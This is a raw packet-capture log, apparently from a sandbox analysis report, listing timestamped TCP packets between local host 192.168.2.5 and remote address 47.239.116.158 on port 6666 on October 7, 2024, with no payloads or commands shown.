                                                                                                            Oct 7, 2024 06:39:10.546536922 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546571016 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546588898 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.546679020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546731949 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.546732903 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546787977 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546822071 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546840906 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.546855927 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.546924114 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547195911 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547251940 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547288895 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547307014 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547322035 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547355890 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547372103 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547419071 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547452927 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547475100 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547487020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547527075 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547549963 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547878027 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547911882 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547935963 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.547965050 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.547997952 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548021078 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548032045 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548065901 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548089981 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548120022 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548152924 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548178911 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548187017 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548221111 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548242092 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548257113 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548310995 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548775911 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548831940 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548883915 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548890114 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.548918962 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548952103 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.548973083 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.549005032 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549038887 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549063921 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.549072027 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549105883 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549139977 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549149036 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.549176931 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549196959 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.549710035 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549763918 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549770117 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.549798012 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549832106 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.549851894 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.596216917 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774056911 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774131060 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774167061 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774223089 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774219036 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774262905 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774286985 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774305105 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774339914 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774355888 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774375916 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774410009 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774429083 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774442911 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774477005 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774493933 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774508953 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774544001 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774558067 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774578094 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774612904 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774625063 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774642944 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774660110 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774679899 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774696112 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774697065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774714947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774730921 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774730921 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774746895 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774764061 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774769068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774781942 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774792910 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774806023 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774832010 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774838924 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774857044 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774887085 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774919033 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774935961 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774951935 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774970055 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774975061 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775002956 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775083065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775099993 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775116920 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775125027 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775134087 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775135994 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775240898 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775620937 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775645971 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775664091 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775680065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775697947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775706053 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775737047 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775746107 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775755882 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775784016 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775785923 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775804043 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775820971 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775835037 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775839090 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775868893 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775974035 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775990963 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776021957 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776032925 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776040077 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776051044 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776067019 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776076078 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776086092 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776094913 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776118994 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776166916 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776654005 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776684046 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776699066 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776732922 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776755095 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776772976 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776788950 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776804924 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776808977 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776858091 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776915073 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776933908 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776951075 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776963949 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776968956 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776987076 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776995897 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777004004 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777020931 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777034044 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777036905 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777055979 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777072906 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777097940 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777589083 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777647972 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777663946 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777690887 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777694941 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777708054 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777725935 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777736902 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777744055 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777774096 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777878046 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777894020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777909994 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777925968 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777929068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777944088 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777961969 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777967930 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777980089 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777992964 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777998924 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778018951 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778038025 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778067112 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778553009 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778570890 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778587103 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778604031 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778620958 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778652906 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.001990080 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002062082 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002098083 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002135038 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002171040 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002170086 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002206087 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002226114 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002269030 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002274990 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002311945 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002346992 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002367973 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002379894 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002413988 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002433062 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002446890 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002480984 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002502918 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002513885 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002547979 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002568007 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002585888 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002619982 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002640009 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002671003 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002708912 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002728939 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002769947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002823114 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002824068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002856970 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002895117 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002909899 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002945900 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002980947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003000975 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003032923 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003067970 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003089905 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003102064 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003138065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003154039 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003171921 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003206015 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003228903 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003238916 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003274918 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003292084 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003309011 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003343105 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003375053 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003381968 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003426075 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003444910 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003479004 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003518105 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003534079 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.049455881 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:13.349332094 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:13.355263948 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:13.355334044 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:13.355916023 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:13.361742973 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.242328882 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.242614985 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.249723911 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.249747992 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.249830961 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.782957077 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783015966 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783051014 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783083916 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783102989 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.783117056 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783149958 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783150911 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.783185005 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783216953 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783233881 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.783251047 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783256054 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.783283949 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783322096 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.783334017 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.788398981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.788625002 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.995728970 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.995764971 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.995798111 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.995836973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.995928049 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.995980978 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996011972 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996036053 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.996043921 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996212959 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.996828079 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996859074 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996892929 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.996893883 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996927023 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.996939898 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.997618914 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.997670889 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.997684002 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.997701883 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.997735023 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.997776985 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.998461008 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.998492956 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.998522997 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.998527050 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.998565912 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.998603106 CEST497096666192.168.2.547.239.116.158
